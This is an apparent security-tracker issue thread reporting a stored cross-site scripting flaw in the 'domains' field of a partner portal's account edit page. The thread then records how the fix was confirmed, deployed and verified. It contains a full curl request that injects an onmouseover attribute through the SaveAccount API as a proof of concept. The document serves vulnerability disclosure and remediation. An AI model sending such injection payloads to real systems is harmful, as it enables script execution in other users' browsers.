### ISSUE TITLE
SEC-5070 - XSS in "domains" field "account name" on accounts edit page

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#146]
XSS is possible in "domains" field "account name" on accounts edit page.

Steps to Reproduce:
* Open https://partners.acronis.com/#connections/accounts
* Copy ID of any existing account
* Make the following request. Set proper <SESSION>, <CSRF_TOKEN)>, <ACCOUNT_ID>

1.  curl -X POST https://partners.acronis.com/api/SaveAccount -H "Content-Type: application/json" -b ".ASPXAUTH=<SESSION>" -H "X-Csrf-Token: <CSRF_TOKEN>" -d '{"accountID":<ACCOUNT_ID>,"json":{"name":"test","domains":"xssgo.live\" onmouseover=\"confirm(166)","address1":null, "address2":null,"address3":null,"city":null,"state":null,"zipcode":null,"country":null, "phone":null,"fax":null,"websiteurl":null,"blogurl":null,"twitterurl":null, "facebookurl":null,"linkedinurl":null,"youtubeurl":null},"cfjson":{}}'

2. {"result":true,"status":0,"version":"8ca1176cb00d1c74fd000d84f29621edf458b748"}
* Go to https://partners.acronis.com/#connections/accounts and open just modified account
* Move the mouse over the added value in domains and see JS executed
![scrot_selection_Sep122022_142044](https://user-images.githubusercontent.com/31324885/189709156-d88c0b08-51cf-4cde-b36c-2a4751a3e533.png)

Fix: encode untrusted input according to the rendering context

**Comment by PuneetRevclerx** [comment]
@shaileshtayde sir, I have checked the above security issue and JS is getting executed by following the above-mentioned steps.

![image](https://user-images.githubusercontent.com/102346181/189861223-1e1914a7-e13d-4796-8556-b66b39f10de2.png)

**Comment by shivmishra** [comment]
@Vinayakvs1994 plz fix

**Comment by PuneetRevclerx** [comment]
@Vinayakvs1994, @shivmishra sir, any domain name containing xss payload in it is not getting removed. If I try to remove a domain containing xss payload, it gets removed but if I open the same account info again, the same domain shows there.

For reference, try to remove domain names from "TestComp" account in the User: puneet security.

**Comment by Vinayakvs1994** [comment]
@PuneetRevclerx the issue is resolved. Please check after branch is build.

**Comment by PuneetRevclerx** [comment]
@shivmishra sir, @sunrao sir,  I have checked above security issue and basic functionality on the given branch (https://pr-52401.dvl.amp.vg/) and it's working as expected now.

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
I have asked the client to verify this.

**Comment by prashantjadhav92** [comment]
Verified by the client.
